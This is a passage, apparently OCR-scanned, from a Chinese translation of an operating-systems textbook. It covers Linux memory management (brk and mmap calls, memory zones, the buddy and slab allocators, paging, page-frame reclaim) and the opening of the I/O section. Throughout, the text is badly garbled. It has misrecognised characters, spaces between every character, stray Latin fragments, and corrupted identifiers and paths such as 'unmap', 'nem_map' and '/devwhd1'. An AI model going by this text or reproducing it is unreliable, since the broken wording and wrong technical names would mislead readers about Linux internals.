外 了 。 在 一 些 圈 子 里 ， 这 种 方法 被 认 为 是 推 印 责任 。 


实际 上 ， 许 多 Linux 系 统 有 管理 内 存 的 系统 调用 。 最 闻 见 的 列 在 了 
图 10-14 中 。brk 通 过 给 出 数据 段 之 外 的 第 一 个 字 万 地 址 来 指定 数据 段 的 
大 小 。 如 采 新 值 比 原来 的 要 大 ， 那 么 数据 段 变 大 ;， 反 之， 数据 段 缩 
Uk ° 


系统 调用 描述 
s=brk (addr) 改变 数据 段 大 小 
a=mmap (addr,len,prot,flags,fd,offset) 映射 文件 | 
s=unmap (addrlen) “| 取消 映射 文件 一 Wh 


Al 10-14 跟 内 存 管 理 相 关 的 一 些 系 统 调用 。 若 过 到 错误 则 返回 码 s 
为 -1; a 和 addr 是 内 存 地 址 ，len 是 长 度 ，prot 是 控制 保护 ，flags 是 混杂 位 
串 ，fdq 是 文件 描述 符 ，offset 是 文件 偏 移 


mmap#munmap % 25 Val FA Pill N FARCE e mmap 的 第 一 个 参 

数 ，addr， 决 定 文件 被 映射 的 地 址 。 它 必须 是 页 大 小 的 倍数 。 如 果 这 个 
参数 挟 0， 系 统 确 定 地 址 并 且 返 回 到 a 中 。 第 二 个 参数 len 指 示 要 映射 的 
字 太 数 。 它 也 必须 十 页 大 小 的 整数 倍 。 第 三 个 参数 ，prot， 确 定 对 映 册 
文件 的 保护 。 它 可 以 标记 为 可 读 、 可 写 、 可 执行 或 者 三 者 的 组 合 。 第 
四 个 参数 ，flags， 控 制 文件 是 私有 的 还 是 共享 的 以 及 addr 是 一 个 需求 还 
是 仅仅 是 一 个 提示 。 第 五 个 参数 ，fd， 是 要 映射 的 文件 的 描述 符 。 只 有 
打开 的 文件 是 可 以 被 映射 的 ， 因 此 为 了 映射 一 个 文件 ， 首 先 必须 要 打 
开 它 。 最 后 ，offset 告 诉 从 文件 中 的 什么 位 置 开 始 映 映 。 并 不 一 定 要 从 
第 0 个 字 节 开始 映射 ， 任 何 页 面 边界 都 是 可 以 的 。 
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另 一 个 调用 ，unmap， 移 除 一 个 被 映射 的 文件 。 如 果 仅 仅 是 文件 的 
一 部 分 撤销 映射 ， 那 么 其 他 部 分 仍然 保持 映射 。 


10.4.3 Linux 中 内 存 管 理 的 实现 


32 位 机 器 上 的 每 个 Linux 进 程 通常 有 3GB 的 虚拟 地 址 空间 ， 还 有 
1GB 留 给 其 页 表 和 其 他 内 核 数 据 。 在 用 户 态 下 运行 时 ， 内 核 的 1GB 是 不 
可 见 的 ， 但 是 当 进 程 陷入 到 内 核 时 是 可 以 访问 的 。 内 核 内 存 通常 驻 留 
在 低 端 物理 内 存 中 ， 但 是 被 映射 到 每 个 进程 虚拟 地 址 空间 顶部 的 1GB 
中 ， 在 地 址 0xC0000000 和 0xFFFFFFFF (3~4GB) 之 间 。 当 进程 创建 
的 上 时候， 进程 地 址 空间 被 创建 ， 并 且 当 发 生 一 个 exec 系 统 调用 时 被 重 
写 o 


为 了 允许 多 个 进程 共享 物理 内 存 ，Linux 监 视 物理 内 存 的 使 用 ， 在 
用 户 进程 或 者 内 核 构件 需要 时 分 配 更 多 的 内 存 ， 把 物理 内 存 动态 映射 
到 不 同 进程 的 地 址 空间 中 去 ， 把 程序 的 可 执行 体 、 文 件 和 其 他 状态 信 
恩 移 入 移出 内 存 来 高 效 地 利用 平台 资源 并 且 保障 程序 执行 的 进展 性 。 
本 章 的 剩余 部 分 描述 了 在 Linux 内 核 中 负责 这 些 操 作 的 各 种 机 制 的 实 
现 。 


1. 物 理 内 存 管理 


在 许多 系统 中 由 于 异 构 便 件 限 制 ， 并 不 是 所 有 的 物理 内 存 都 能 被 
相同 地 对 每 ， 尤 其 是 对 于 WO 和 虚拟 内 存 。Linux 区 分 三 种 内 存 区 域 


(zone) : 


1)ZONE_DMA: 可 以 用 来 DMA 操 作 的 页 。 
2)ZONE_NORMAL: 正常 规则 映射 的 页 。 
3)ZONE_HIGHMEM: 高 内 存 地 址 的 页 ， 并 不 永久 性 映射 。 


内 存 区 域 的 确切 边界 和 布局 是 硬件 体系 结构 相关 的 。 在 x86 硬 件 
上 ， 一 些 设备 只 能 在 起 始 的 16MB 地 址 空间 进行 DMA 操 作 ， 因 此 
ZONE_DMA 了 束 在 0 一 16MB 的 范围 内 。 此 外 ， 人 硬件 也 不 能 直接 映射 
896MB 以 上 的 内 存 地 址 ， 因 此 ZONE_HIGHMEM 就 是 高 于 该 标记 的 任 
何 地 址 。ZONE_NORMAL 是 介 于 其 中 的 任何 地 址 。 因 此 在 x86 平 台 
上 ，Linux 地 址 空间 的 起 始 896MB 是 直接 映射 的 ， 而 内 核 地 址 空间 的 剩 
余 128MB 是 用 来 访问 高 地 址 内 存 区 域 的 。 内 核 为 每 个 内 存 区 域 维护 一 
个 zone 数据 结构 ， 并 且 可 以 分 别 在 三 个 区 域 上 执行 内 存 分 配 。 


Linux 的 内 存 由 三 部 分 组 成 。 前 两 部 分 是 内 核 和 内 存 映射 ， 
被 <" 钉 ”在 内 存 中 (页 面 从 来 不 换 出 ) 。 内 存 的 其 他 部 分 被 划分 成 页 
框 ， 每 一 个 页 框 都 可 以 包含 一 个 代码 、 数 据 或 者 栈 页 面 ， 一 个 页 表 页 
面 ， 或 者 在 空闲 列表 中 。 


内 核 维护 内 存 的 一 个 映射 ， 该 映射 包含 了 所 有 系统 物理 内 存 使 用 
情况 的 信息 ， 比 如 区 域 、 空 内 页 框 等 。 如 图 10-15， 这 些 信息 是 如 下 组 


织 的 。 


首先 ，Linux 维 护 一 个 页 描述 符 数 组 ， 称 为 mem_map， 其 中 页 描述 
从 是 page 类 型 的 ， 而 且 系 统 当中 的 每 个 物理 页 框 都 有 一 个 页 搬 述 符 。 
每 个 页 接 述 符 部 有 个 指针 ， 在 页 面 非 空 几时 指向 它 所 属 的 地 址 空间 ， 
男 有 一 对 指针 可 以 使 得 它 跟 其 他 摘 述 符 形 成 双 癌 链表 ， 来 记录 所 有 的 
空间 页 框 和 一 些 其 他 的 域 。 在 图 10-15 中 ， 页 面 150 的 页 描述 符 包含 一 个 
到 其 所 属地 址 空间 的 映射 。 页 面 70、 页 面 80、 页 面 200 是 空闲 的 ， 它 们 
征 被 链接 在 一 起 的 。 页 朱 述 符 的 大 小 是 32 字 世 ， 因 此 整个 nem_map 请 
耗 了 不 到 1% 的 物理 内 存 (对 于 4KB 的 页 框 ) 。 


因为 物理 内 存 被 分 成 区 域 ， 所 以 Linux 为 每 个 区 域 维护 一 个 区 域 描 
述 符 。 区 域 揪 述 符 包含 了 每 个 区 域 中 内 存 利用 情况 的 信息 ， 例 如 活动 
和 非 活 动 页 的 数目 ， 页 面 置换 算法 (本 章 后 面 介绍 ) 所 使 用 的 高 低 水 
位 ， 还 有 许多 其 他 的 域 。 


此 外 ， 区 域 插 述 特 包含 一 个 空 几 区 数组 。 该 数组 中 的 第 个 元 素 标 
记 了 2 个 空闲 页 的 第 一 个 块 的 第 一 个 页 描述 符 。 既 然 可 能 有 多 块 2 个 
空 几 页 ，Linux 使 用 页 搬 述 符 的 指针 对 把 这 些 页 面 链 接 起 来 。 这 个 信息 
在 Linux 的 内 存 分 配 操 作 中 使 用 。 在 图 10-15 中 ，free_area[0] 标 记 所 有 仪 
由 一 个 页 框 组 成 的 物理 内 存 空 几 区 ， 现 在 指向 页 面 70， 三 个 空 几 区 当 
中 的 第 一 个 。 其 他 大 小 为 一 个 页 面 的 空闲 块 也 可 通过 页 描述 符 中 的 链 
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图 10-15 Linux 内 存 表示 


最 后 ，Linux 可 以 移植 到 NUMA 体 系 结构 (不 同 的 内 存 地 址 有 不 同 
的 访问 时 间 ) ， 为 了 区 分 不 同 节 点 上 的 物理 内 存 (同时 避免 跨 节点 分 
配 数据 结构 ) ， 使 用 了 一 个 节点 描述 符 。 每 个 节点 描述 符 包含 了 内 存 
使 用 的 信息 和 该 节点 上 的 区 域 。 在 UMA 平 台 上 ，Linux 用 一 个 节点 描述 
符 描述 所 有 的 内 存 。 每 个 页 描述 符 的 最 初 一 些 位 是 用 来 指定 该 页 框 所 
属 的 节点 和 区 域 的 。 


为 了 使 分 页 机 制 在 32 位 和 64 位 体系 结构 下 高 效 工 作 ，Linux 采 用 了 
一 个 四 级 分 页 策略 。 这 是 一 种 最 初 在 Alpha 系 统 中 使 用 的 三 级 分 页 策 
RS, 7ELinux 2.6.10 之 后 加 以 扩展 ， 并 且 从 2.6.11 版 本 以 后 使 用 的 一 个 四 
级 分 页 策略 。 每 个 虚拟 地 址 划分 成 五 个 域 ， 如 图 10-16。 目录 域 是 页 目 
录 的 索引 ， 每 个 进程 都 有 一 个 私有 的 页 目录 。 找 到 的 值 是 指向 其 中 一 
个 下 一 级 目录 的 一 个 指针 ， 该 目录 也 由 虚拟 地 址 的 一 个 域 索 引 。 中 级 
页 目录 表 中 的 表 项 指向 最 终 的 页 表 ， 它 是 由 虚拟 地 址 的 页 表 域 索引 
的 。 页 表 的 表 项 指向 所 需要 的 页 面 。 在 Pentium 处 理 器 (使 用 两 级 分 
页 上 ， 每 个 页 的 上 级 和 中 级 目录 仪 有 一 个 表 项 ， 因 此 总 目录 项 就 可 
以 有 效 地 选择 要 使 用 的 页 表 。 类 似 地 ， 在 需要 的 时 候 可 以 使 用 三 级 分 
页 ， 此 时 把 上 级 目录 域 的 大 小 设置 为 0 就 可 以 了 。 
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图 10-16 Linux 使 用 四 级 页 表 
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任何 一 部 分 都 不 会 换 出 。 内 存 的 其 余部 分 可 以 作为 用 户 页 面 、 分 页 组 
存 和 其 他 目的 。 页 面 缓存 包含 最 近 已 读 的 或 者 由 于 未 来 有 可 能 使 用 而 
预 读 的 文件 块 ， 或 者 需要 写 回 磁盘 的 文件 块 页 面 ， 例 如 那些 被 换 出 到 
磁盘 的 用 户 进 程 创建 的 页 面 。 分 页 缓存 并 不 是 一 个 独立 的 缓存 ， 而 是 
那些 不 再 需要 的 或 者 等 待 换 出 的 用 户 页 面 集 合 。 如 果 分 页 缓存 当中 的 
一 个 页 面 在 被 换 出 内 存 之 前 复 用 ， 它 可 以 被 快速 收回 。 


此 外 ，Linux 文 持 动 态 加 载 模 块 ， 最 第 见 的 是 设备 转动 。 它 们 可 以 
是 任意 大 小 的 并 且 必 须 分 配 一 个 连续 的 内 核 内 存 。 这 些 需求 的 一 个 直 
接 结果 是 ，Linux 用 这 样 一 种 方式 来 管理 物理 内 存 使 得 它 可 以 随意 分 配 
任意 大 小 的 内 存 片 。 它 使 用 的 算法 就 是 伙伴 算法 ， 下 面 给 予 描述 。 


2. 内 存 分 配 机 制 


Linux 文 持 多 种 内 存 分 配 机 制 。 分 配 物 理 内 存 页 框 的 主要 机 制 十 页 
面 分 配 右 ， 它 使 用 了 著名 的 伙伴 算法 。 


管理 一 块 内 存 的 基本 思想 如 下 。 刚 开始 ， 内 存 由 一 块 连续 的 片段 
组 成 ， 图 10-17a 的 简单 例子 中 是 64 个 页 面 。 当 一 个 内 存 请 求 到 达 时 ， 目 
先 上 省 入 到 2 的 项 ， 比 如 8 个 页 面 。 然 后 整个 内 存 块 被 分 割 成 两 半 ， 如 
图 b 所 示 。 因 为 这 些 片段 还 古 太 大 了 ， 较 低 的 片段 被 再 次 二 分 (c) ， 


然后 再 二 分 (d) 。 现 在 我 们 有 一 块 大 小 合适 的 内 存 ， 因 此 把 它 分 配给 
请 求 者 ， 如 图 d 所 示 。 
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图 10-17 伙伴 算法 的 操作 


现在 假定 8 个 页 面 的 第 二 个 请 求 到 达 了 。 这 个 请 求 有 (e) BRB 
足 了 。 此 时 4 个 页 面 的 第 三 个 请 求 到 达 了 “。 最 小 可 用 的 块 被 分 割 (f) ， 
然后 其 一 半 被 分 配 (g) 。 接 下 来 ，8 页 面 的 第 二 个 块 被 释放 (h) 。 最 
后 ，8 页 面 的 另 一 个 块 也 被 释放 。 因 为 刚刚 释放 的 两 个 邻接 的 8 页 面 块 
来 自 同一 个 16 页 面 块 ， 它 们 合并 起 来 得 到 一 个 16 页 面 的 块 (i) 。 


Linux 用 伙伴 算法 管理 内 存 ， 同 时 有 一 些 附 加 特性 。 它 有 个 数组 ， 
其 中 的 第 一 个 元 素 是 大 小 为 1 个 单位 的 内 存 块 列表 的 头 部 ， 第 二 个 元 素 
征 大 小 为 2 个 单位 的 内 存 块 列表 的 头 部 ， 下 一 个 是 大 小 为 4 个 单位 的 内 
存 块 列 表 的 头 部 ， 以 此 类 推 。 通 过 这 种 方法 ， 任 何 2 的 才 次 大 小 的 块 都 
可 以 快速 找到 。 


这 个 算法 导致 了 大 量 的 内 部 碎片 ， 因 为 如 采 想 要 65 页 面 的 块 ， 必 
须要 请 求 并 且 得 到 一 个 128 页 面 的 块 。 


为 了 缓解 这 个 问题 ，Linux 有 另 一 个 内 存 分 配 郁 ，slab 分 配 船 。 它 
使 用 伙伴 算法 获得 内 存 块 ， 但 是 之 后 从 其 中 切 出 slab (更 小 的 单元 ) 并 


且 分 别 进行 管理 。 


因为 内 核 频 繁 地 创建 和 撤销 一 定 类 型 的 对 象 《如 task_struct) ， 它 
使 用 了 对 和 象 缓存 。 这 些 缓存 由 指 癌 一 个 或 多 个 slab 的 指针 组 成 ， 而 slab 
可 以 存储 大 量 相同 类 型 的 对 象 。 每 个 slab 有 要么 是 满 的 ， 要 么 是 部 分 满 
A), 要 人 十 至 的” 


例如 ， 当 内 核 需 要 分 配 一 个 新 的 进程 描述 符 (一 个 新 的 
task_struct) 的 时 候 ， 它 在 task 结 构 的 对 象 缓存 中 寻找 ， 首 先 试 图 找 一 
个 部 分 满 的 slab 并 且 在 那里 分 配 一 个 者 的 task_struct 对 象 。 如 果 没 有 这 
样 的 slab 可 用 ， 束 在 空间 slab 列 表 中 但 找 。 最 后 ， 如 琳 必 要 ， 它 会 分 配 
一 个 新 的 slab， 把 新 的 task 结 构 放 在 那里 ， 同 时 把 该 slab 连 接 到 task 结 构 
对 象 缓存 中 。 在 内 核 地 址 空间 分 配 连 续 的 内 存 区 域 的 kmalloc 内 核 服 
务 ， 实 际 上 就 是 建立 在 slab 和 对 象 缓存 接口 之 上 的 。 


第 三 个 内 存 分 配器 vmalloc 也 是 可 用 的 ， 并 且 用 于 那些 仅仅 需要 虚 
拟 地 址 空间 连续 的 请 求 。 实 际 上 ， 这 一 点 对 于 大 部 分 内 存 分 配 是 成 立 
的 。 一 个 例外 是 设备 ， 它 位 于 内 存 总 线 和 内 存 管理 单元 的 另 一 端 ， 


此 并 不 理解 虚拟 地 址 。 然 而 ，vmalloc 的 使 用 导致 一 些 性 能 的 损失 ， 主 
要 用 于 分 配 大 量 连续 虚拟 地 址 空间 ， 例 如 动态 插入 内 核 模 块 。 所 有 这 
些 内 存 分 配器 都 是 继承 自 System V 中 的 那些 分 配器 。 


3. 虚 拟 地 址 空间 表示 


虚拟 地 址 空间 被 分 割 成 同 构 连续 页 面 对 齐 的 区 域 。 也 就 是 说 ， 
个 区 域 由 一 系列 连续 的 具有 相同 保护 和 分 页 属性 的 页 面 组 成 。 代 码 段 
和 映射 文件 就 是 区 (area) 的 例子 ( 见 图 10-15) 。 在 虚拟 地 址 空间 的 
区 之 间 可 以 有 空 际 。 所 有 对 这 些 空隙 的 引用 都 会 导致 一 个 严重 的 页 面 
故障 。 页 大 小 是 确定 的 ， 例 如 Pentium 是 4KB 而 Alpha 是 8KB ° Pentium 
文 持 4MB 的 页 杠 ，Linux 可 以 支持 4MB 的 大 页 框 。 而 且 ， 在 PAE (物理 
地 址 扩展 ) 模式 下 ，2MB 的 页 大 小 是 文 持 的 。 在 一 些 32 位 机 器 上 和 党 用 
PAE 来 增加 进程 地 址 空间 ， 使 之 超过 4GB 。 


在 内 核 中 ， 每 个 区 是 用 vm_area_struct 项 来 描述 的 。 一 个 进程 的 所 
有 vm_area_struct 用 一 个 链表 链接 在 一 起 ， 并 且 按 照 虚 拟 地 址 排序 以 便 
可 以 找到 所 有 的 页 面 。 当 这 个 链表 太 长 时 (多 于 32 项 ) ， 就 创建 一 个 
树 来 加 速 搜索 。vm_area_struct 项 列 出 了 该 区 的 属性 。 这 些 属 性 包括 : 
保护 模式 《如 ， 只 读 或 者 可 读 可 写 ) 、 是 否 固定 在 内 存 中 (不 可 换 
出 ) 、 朝 向 哪个 方向 生长 (数据 段 向 上 长 ， 栈 段 同 下 长 )。 


vm_area_struct 也 记录 该 区 是 私有 的 还 是 跟 一 个 或 多 个 其 他 进程 共 
享 的 。fork 之 后 ，Linux 为 子 进程 复制 一 份 区 链表 ， 但 是 让 父子 进程 指 
回 相 同 的 页 表 。 区 被 标记 为 可 读 可 写 ， 但 是 页 面 却 被 标记 为 只 读 。 如 
果 任 何 一 个 进程 试图 写 页 面 ， 就 会 产生 一 个 保护 故障 ， 此 时 内 核发 现 
该 内 存 区 逻辑 上 是 可 写 的 ， 但 是 页 面 却 不 是 ， 因 此 它 把 该 页 面 的 一 个 
副本 给 当前 进程 同时 标记 为 可 读 可 写 。 这 个 机 制 惑 说 明了 写 时 复制 是 
如 何 实现 的 。 
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什么 地 方 。 代 码 段 把 可 执行 二 进 制 文件 作为 备份 存储 ， 内 存 映 射 文件 
把 磁 强 文件 作为 备份 存储 。 其 他 区 ， 如 栈 ， 直 到 它们 不 得 不 家 换 出 ， 
否则 没有 备份 存储 被 分 配 。 


一 个 顶层 内 存 描述 符 mm_struct 收 集 属于 一 个 地 址 空间 的 所 有 虚拟 
内 存 区 相关 的 信息 ， 还 有 关于 不 同 段 (代码 ， 数 据 ， 栈 ) 和 用 户 共享 
地 址 空间 的 信息 等 。 一 个 地 址 空间 的 所 有 vm_area_struct 元 素 可 以 通过 
内 存 描述 符 用 两 种 方式 访问 。 首 和 完 ， 它 们 是 按照 虚拟 地 址 顺序 组 织 在 
链表 中 的 。 这 种 方式 的 有 用 之 处 是 : 当 所 有 的 虚拟 地 址 区 需要 被 访问 
时 ， 或 者 当 内 核查 找 分 配 一 个 指定 大 小 的 虚拟 内 存 区 域 时 。 此 外 ， 
vm_area_struct 项 目 被 组 织 成 二 义 “ 红 黑 * 树 (一 种 为 了 快速 查找 而 优化 
的 数据 结构 ) 。 这 种 方法 用 于 访问 一 个 指定 的 虚拟 内 存 地 址 。 为 了 能 
够 用 这 两 种 方法 访问 进程 地 址 空间 的 元 素 ，Linux 为 每 个 进程 使 用 了 更 


多 的 状态 ， 但 是 却 允 许 不 同 的 内 核 操 作 来 使 用 这 些 访问 方法 ， 这 对 进 
程 而 言 更 加 高 效 。 


10.4.4 Linux PAN4 TA 


早期 的 UNIX 系 统 ， 每 当 所 有 的 活动 进程 不 能 容纳 在 物理 内 存 中 时 
束 用 一 个 交换 进程 在 内 存 和 人 秒 盘 之 间 移 动 整个 进程 。Linux 跟 其 他 现代 
UNIX 版 本 一 样 ， 不 再 移动 整个 进程 了 。 内 存 管 理 单元 是 一 个 页 ， 并 且 
几乎 所 有 的 内 存 管理 部 件 以 页 为 操作 粒度 。 交 换 子 系统 也 是 以 页 为 操 
作 粒 度 的 ， 并 且 跟 页 框 回 收 算法 紧 糊 合 在 一 起 。 这 个 后 面 会 给 予 摘 
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Linux 分 页 育 后 的 基本 思想 是 简单 的 : 为 了 运行 ， 一 个 进程 并 不 需 
要 完全 在 内 存 中 。 实 际 上 所 需要 的 是 用 户 结构 和 页 表 。 如 果 这 些 被 换 
进 内 存 ， 那 么 进程 被 认为 是 “在 内 存 中 ”， 可 以 被 调度 运行 了 。 代 码 、 
数据 和 栈 段 的 页 面 是 动态 载 入 的 ， 仅 仅 是 在 它们 被 引用 的 时 候 。 如 采 
用 户 结构 和 页 表 不 在 内 存 中 ， 直 到 交换 大 把 它们 载 入 内 存 进 程 才能 运 


Te 

分 页 是 一 部 分 由 内 核实 现 而 一 部 分 由 一 个 新 的 进程 ， 页 面 守护 进 
程 ， 实 现 的 。 页 面 守 护 进 程 是 进程 2 〈 进 程 0 是 idle 进 程 ， 传 统 上 称 为 交 
换 器 ， 而 进程 1 是 init， 如 图 10-11 所 示 ) 。 跟 所 有 守护 进程 一 样 ， 页 面 
守护 进程 周期 性 地 运行 。 一 旦 唤醒 ， 它 主动 查找 是 否 有 工作 要 干 。 如 
果 它 发 现 空 间 页 面 数 量 太 少 ， 就 开始 释放 更 多 的 页 面 。 


Linux 古 一 个 请 求 换 页 系统 ， 没 有 预 分 页 和 工作 集 的 概念 (尽管 有 
个 系统 调用 ， 其 中 用 户 可 以 给 系统 一 个 提示 将 要 使 用 某 个 页 面 ， 布 望 
需要 的 时 候 页 面 在 内 存 中 ) 。 代 码 段 和 映射 文件 换 页 到 它们 各 自在 磁 
盘 上 的 文件 中 。 所 有 其 他 的 都 被 换 页 到 分 页 分 区 (如 采 存 在 ) 或 者 一 
个 固定 长 度 的 分 页 文件 ， 叫 做 交换 区 。 分 页 文件 可 以 被 动态 地 添加 或 
者 删除 ， 并 且 每 个 都 有 一 个 优先 级 。 换 页 到 一 个 独立 的 分 区 并 且 像 一 
个 原始 设备 那样 访问 的 这 种 方式 要 比 换 页 到 一 个 文件 的 方式 更 加 高 
效 。 有 多 个 原因 : 首先 ， 文 件 块 和 磁盘 块 的 映射 不 需要 了 A T 
盘 1/O 读 间接 块 ; ; 其次， 物理 写 可 以 是 任意 大 小 的 ， 并 不 仅仅 是 文件 
块 大 小 ; 第 三 ， 一 个 页 总 是 被 连续 地 写 到 伐 副 ， 用 一 个 分 页 文件 ， 也 
许 是 或 者 也 许 不 是 这 样 的 。 


页 面 只 有 在 需要 的 时 候 才 在 分 页 设备 或 者 分 区 上 被 分 配 。 每 个 设 
备 和 文件 由 一 个 位 图 开始 说 明 哪些 页 面 古 空间 的 。 当 一 个 没有 备份 存 
储 的 页 面 必须 换 出 的 时 候 ， 仍 有 至 朵 空间 的 最 高 优先 级 的 分 页 分 区 或 
者 文件 被 迁 中 并 且 在 其 上 面 分 配 一 个 页 面 。 正 第 情况 下 ， 分 页 分 区 
ETE) 拥有 比 任何 分 页 文件 更 高 的 优先 级 。 页 表 被 及 时 更 新 以 反 
映 页 面 已 经 不 在 内 存 了 (如 ，page-not-present 位 被 设置 ) 同时 磁盘 位 
置 被 写 入 到 页 表 项 。 


页 面 置 换算 法 
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在 需要 的 时 候 分 配 它 们 。 当 然 ， 这 个 页 面 池 必须 不 断 地 加 以 补充 。 
PFRA (页 框 回收 算法 ) 算法 展示 了 它 是 如 何 发 生 的 。 


首先 ，Linux 区 分 四 种 不 同 的 页 面 : 不 可 回收 的 
(unreclaimable) 、 可 交换 的 (swappable) 、 可 同步 的 (syncable) ` 
可 丢弃 的 (discardable) 。 不 可 回收 页 面包 括 保 留 或 者 锁定 页 面 、 内 
核 态 栈 等 ， 不 会 被 换 出 页 面 。 可 交换 页 必须 在 回收 之 前 写 回 到 交换 区 
或 者 分 页 磁盘 分 区 。 可 同步 的 页 面 如 果 被 标记 为 dirty 就 必须 要 写 回 到 
磁盘 。 最 后 ， 可 丢弃 的 页 面 可 以 被 立即 回收 。 


在 启动 的 时 候 ，init 开 局 一 个 页 面 守护 进程 kswapd (EANET A 
都 有 一 个 ) ， 并 且 配 置 它 们 能 周期 性 运行 。 每 次 kswapd 被 唤醒 ， 它 通 
过 比较 每 个 内 存 区 域 的 高 低 水 位 来 检查 是 否 有 足够 的 空闲 页 面 可 用 。 
如 果 有 足够 的 空间 页 面 ， 它 就 继续 睡眠 。 当 然 它 也 可 以 在 需要 更 多 页 
面 时 被 提前 唤醒 。 如 果 任 何 内 存 区 域 的 可 用 空间 低 于 一 个 病 值 ， 
kswapd 初 始 化 页 框 回收 算法 。 在 每 次 运行 过 程 中 ， 仅 有 一 个 确定 数目 
的 页 面 被 回收 ， 典 型 值 是 32。 这 个 值 是 受 限 的 ， 以 控制 WO 压力 (由 
PFRA 操 作 导 致 的 磁盘 写 的 次 数 ) 。 回 收 页 面 的 数量 和 扫描 页 面 的 总 数 
量 是 可 配置 的 参数 。 


每 次 PFRA 执 行 ， 它 首先 回收 容易 的 页 面 ， 然 后 处 理 更 难 的。 可 丢 
弃 页 面 和 未 被 引用 的 页 面 都 是 可 以 被 立即 回收 的 ， 同 时 把 它们 庆 、 加 到 


区 域 的 空 帮 链表 中 。 接 着 它 查 找 有 备份 存储 同时 近期 未 被 使 用 的 页 

面 ， 使 用 一 个 类 似 于 时 钟 的 算法 。 青 后 来 束 是 用 户 使 用 不 多 的 共 至 页 
面 。 共 至 页 面市 来 的 挑战 是 ， 如 采 一 个 页 面 补 回 收 ， 那 么 所 有 共 至 了 
该 页 面 的 所 有 地 址 空间 的 页 表 都 要 同步 更 新 。Linux 维 护 高 效 的 类 树 数 
据 结 构 来 方便 地 找到 一 个 共 至 页 面 的 所 有 使 用 者 。 普 通用 户 页 面 在 此 
之 后 被 查找 ， 如 有 果 被 选中 换 出 ， 它 们 必须 被 调度 写 入 交换 区 。 系 统 的 
swappiness， 即 有 备份 存储 的 页 面 和 在 PFRA 中 被 换 出 的 页 面 的 比率 ， 

苹 该 算法 的 一 个 可 调 参 数 。 最 后 ， 如 果 一 个 页 是 无 效 的 、 不 在 内 存 、 
共 至 、 锁 定 在 内 存 或 者 拥有 DMA， 那 么 它 被 跳 过 。 


PFRA 用 一 个 类 似 时 钟 的 算法 来 选择 旧 页 面 换 出 。 这 个 算法 的 核心 
征 一 个 循环 ， 它 扫描 每 个 区 域 的 活动 和 非 活 动 列表 ， 试 图 按照 不 同 的 
暴 迫 程度 回收 不 同类 型 的 页 面 。 紧 迫 性 数值 作为 一 个 参数 传递 给 该 过 
程 ， 说 明 人 花费 多 大 的 代价 来 回收 一 些 页 面 。 通 汕 ， 这 意味 着 在 放弃 之 


前 检查 多 少 个 页 面 。 


在 PFRA 期 间 ， 页 面 按照 图 10-18 描 述 的 方式 在 活动 和 非 活动 列表 
之 间 移 来 移 去 。 为 了 维护 一 些 司 发 并 且 尽量 找 出 没有 被 引用 的 和 近期 
不 可 能 被 使 用 的 页 面 ， PFRA 为 每 个 页 面 维护 两 个 标记 :活动 / 非 活动 
和 是 否 被 引用 。 这 两 个 标记 构成 四 种 状态 ， 如 图 10-18 所 示 。 在 对 一 个 
页 面 集合 的 第 一 过 扫描 中 ，PFRA 首 移 清 除 它们 的 引用 位 。 如 果 在 第 二 


次 运行 期 间 确定 它 已 经 个 引 用 ， 则 把 它 提升 到 为 一 个 状态 ， 这 样 束 不 
太 可 能 回收 它 了 。 人 否则 ， 将 该 页 面 移动 到 一 个 更 可 能 被 回收 的 状态 。 


非 活动 活动 


PG_active =0 l PG_active = 1 


PG_referenced = 0 PG_referenced = 0 


被 使 用 a 被 使 用 


PG active=0 PG_active = 1 


PG_referenced = 1 PG_referenced = 1 


10-18 ”页 框 置换 算法 中 考虑 的 页 面 状态 


处 在 非 活 动 列 表 上 的 页 面 ， 目 从 上 次 检查 未 被 引用 过 ， 故 而 是 移 
出 的 最 佳 候选 。 有 些 页 面 的 PG_active 和 PG_referenced 都 被 置 为 0， 如 
图 10-18。 然 而 ， 如 果 和 需要 ， 处 于 其 他 状态 的 页 面 也 可 能 会 补 回 收 。 
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PFRA 维 护 一 些 页 面 ， 尽 管 可 能 已 经 被 引用 但 在 非 活动 列表 中 ， 其 
原因 是 为 了 避免 如 下 的 情形 。 考 虑 一 个 进程 周期 性 访问 不 同 的 页 面 ， 


比如 周期 为 1 个 小 时 。 从 最 后 一 次 循环 开始 被 访问 的 页 面 会 设置 其 引用 
标志 位 。 然 而 ， 接 下 来 的 一 个 小 时 里 不 再 使 用 它 ， 没 有 理由 不 考虑 把 
它 作 为 一 个 回收 的 候选 。 


10.5 Linux 中 的 IO 系统 


Linux 和 其 他 的 UNIX 系 统一 样 ，IO 系 统 都 相当 的 简单 明了 “。 基 本 
上 ， 上 所 有 的 IO 设备 都 被 当 作 文件 来 处 理 ， 并 且 通 过 与 访问 所 有 文件 同 
样 的 read 和 write 系统 调用 来 访问 。 在 某 些 情况 下 ， 必 须 通过 一 个 特殊 
的 系统 调用 来 设置 设备 的 参数 。 我 们 会 在 下 面 的 章节 中 学 习 这 些 细 


He 


"H O 


10.5.1 基本 概念 


像 所 有 的 计算 机 一 样 ， 运 行 Linux 的 计算 机 具有 磁盘 、 打 印 机 、 网 
络 等 0 设备。 需要 一 些 策略 才能 使 程序 能 够 访问 这 些 设备 。 有 很 多 不 
同 的 方法 都 可 以 达到 目的 ，Linux 把 设备 当 作 一 种 特殊 文件 整合 到 文件 
系统 中 。 每 个 IO 设备 都 被 分 配 了 一 条 路 径 ， 通 党 在 /dev 目 了 示 下 。 例 
如 : 一 个 磁盘 的 路 径 可 能 是 "devwhd1”， 一 个 打印 机 的 路 径 可 能 
是 “dewlp”， 网 络 的 路 径 可 能 是 “/devnet”。 


可 以 用 与 访问 其 他 普通 文件 相同 的 方式 来 访问 这 些 特殊 文件 。 不 
需要 特殊 的 命令 或 者 系统 调用 。 常 用 的 open、read、write 等 系统 调用 
就 够 用 了 。 例 如 : 下 面 的 命令 


cp file/dev/1p 


把 文件 “file” 复 制 到 打印 机 %dewlp”， 然 后 开始 打印 (假设 用 户 具 
有 访问 “/dev/lp” 的 权限 ) 。 程 序 能 够 像 操作 普通 文件 那样 打开 、 读 、 
写 特殊 文件 。 实 际 上 ， 上 面 的 “cp” 命 令 甚至 不 知道 是 要 打印 “file” 文 
件 。 通 过 这 种 方法 ， 不 需要 任何 特殊 的 机 制 束 能 进行 WO 。 


特殊 文件 (设备 ) 分 为 两 类 ， 块 特殊 文件 和 字符 特殊 文件 。 一 个 
块 特殊 文件 由 一 组 具有 编号 的 块 组 成 。 块 特殊 文件 的 主要 特性 是 ， 每 
一 个 块 部 能 够 被 独立 地 寻 址 和 访问 。 也 束 古 说 ， 一 个 程序 能 够 打开 一 
